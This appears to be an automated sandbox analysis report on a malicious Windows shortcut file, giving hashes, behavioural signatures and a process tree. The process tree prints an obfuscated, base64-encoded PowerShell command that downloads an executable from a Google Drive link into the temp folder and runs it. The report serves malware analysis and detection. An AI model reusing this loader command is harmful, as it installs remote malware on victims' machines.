Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
18-09-2024 21:36
Static task
static1
Behavioral task
behavioral1
Sample
ea037f858b767baef3eb6c9eff455c83_JaffaCakes118.lnk
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
ea037f858b767baef3eb6c9eff455c83_JaffaCakes118.lnk
Resource
win10v2004-20240802-en
General
-
Target
ea037f858b767baef3eb6c9eff455c83_JaffaCakes118.lnk
-
Size
3KB
-
MD5
ea037f858b767baef3eb6c9eff455c83
-
SHA1
1b91f976a4458c8c315fae6b731eb80b615fd3a3
-
SHA256
7e614a8b38ce81dc274032850bdc9e6cc41b80d6c0eaddcf5b1989add198a96b
-
SHA512
012b033aff2a3a35d54f0be5b32b1ea7b5599cff09d9ba7a25be4f20ca697a81618d68defee97ef5dd4cf31a966802a8637a570e4e050a97441d3c622211b3dd
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=17arYmcfomWk-aZSZP9P1qjMl442HppCm
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 1684 powershell.exe 10 1684 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3372 powershell.exe 3372 powershell.exe 1684 powershell.exe 1684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3372 powershell.exe Token: SeDebugPrivilege 1684 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1692 wrote to memory of 3372 1692 cmd.exe 83 PID 1692 wrote to memory of 3372 1692 cmd.exe 83 PID 3372 wrote to memory of 3052 3372 powershell.exe 84 PID 3372 wrote to memory of 3052 3372 powershell.exe 84 PID 3052 wrote to memory of 1684 3052 cmd.exe 85 PID 3052 wrote to memory of 1684 3052 cmd.exe 85
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ea037f858b767baef3eb6c9eff455c83_JaffaCakes118.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmD /c POwErshEll.exE -ex bypASS -EC IAALACAAKAAgACAACQBuAGUAdwAtAG8AQgBqAEUAYwBUAAkAIAAJAFMAWQBTAFQAZQBNAC4AbgBlAFQALgB3AEUAQgBDAGwASQBlAG4AVAAJACAACQApAC4ARABvAHcAbgBsAG8AQQBkAGYASQBMAEUAKAAgAAsAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxADcAYQByAFkAbQBjAGYAbwBtAFcAawAtAGEAWgBTAFoAUAA5AFAAMQBxAGoATQBsADQANAAyAEgAcABwAEMAbQAdICAAIAAgACwAIAAJAAkAHSAkAGUAbgB2ADoAVABFAG0AcABcAGMAYwBhAGcAdQBiAGIAdgB2AHYAYgBpAGQAZQAuAGUAeABlAB0gCQALACAAKQAgAAsAIAA7ACAACQAJAEkAbgBWAG8ASwBFAC0ASQBUAEUAbQAJAAsACQAdICQAZQBOAFYAOgBUAGUATQBQAFwAYwBjAGEAZwB1AGIAYgB2AHYAdgBiAGkAZABlAC4AZQB4AGUAHSA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c POwErshEll.exE -ex bypASS -EC IAALACAAKAAgACAACQBuAGUAdwAtAG8AQgBqAEUAYwBUAAkAIAAJAFMAWQBTAFQAZQBNAC4AbgBlAFQALgB3AEUAQgBDAGwASQBlAG4AVAAJACAACQApAC4ARABvAHcAbgBsAG8AQQBkAGYASQBMAEUAKAAgAAsAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxADcAYQByAFkAbQBjAGYAbwBtAFcAawAtAGEAWgBTAFoAUAA5AFAAMQBxAGoATQBsADQANAAyAEgAcABwAEMAbQAdICAAIAAgACwAIAAJAAkAHSAkAGUAbgB2ADoAVABFAG0AcABcAGMAYwBhAGcAdQBiAGIAdgB2AHYAYgBpAGQAZQAuAGUAeABlAB0gCQALACAAKQAgAAsAIAA7ACAACQAJAEkAbgBWAG8ASwBFAC0ASQBUAEUAbQAJAAsACQAdICQAZQBOAFYAOgBUAGUATQBQAFwAYwBjAGEAZwB1AGIAYgB2AHYAdgBiAGkAZABlAC4AZQB4AGUAHSA=3⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwErshEll.exE -ex bypASS -EC IAALACAAKAAgACAACQBuAGUAdwAtAG8AQgBqAEUAYwBUAAkAIAAJAFMAWQBTAFQAZQBNAC4AbgBlAFQALgB3AEUAQgBDAGwASQBlAG4AVAAJACAACQApAC4ARABvAHcAbgBsAG8AQQBkAGYASQBMAEUAKAAgAAsAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxADcAYQByAFkAbQBjAGYAbwBtAFcAawAtAGEAWgBTAFoAUAA5AFAAMQBxAGoATQBsADQANAAyAEgAcABwAEMAbQAdICAAIAAgACwAIAAJAAkAHSAkAGUAbgB2ADoAVABFAG0AcABcAGMAYwBhAGcAdQBiAGIAdgB2AHYAYgBpAGQAZQAuAGUAeABlAB0gCQALACAAKQAgAAsAIAA7ACAACQAJAEkAbgBWAG8ASwBFAC0ASQBUAEUAbQAJAAsACQAdICQAZQBOAFYAOgBUAGUATQBQAFwAYwBjAGEAZwB1AGIAYgB2AHYAdgBiAGkAZABlAC4AZQB4AGUAHSA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82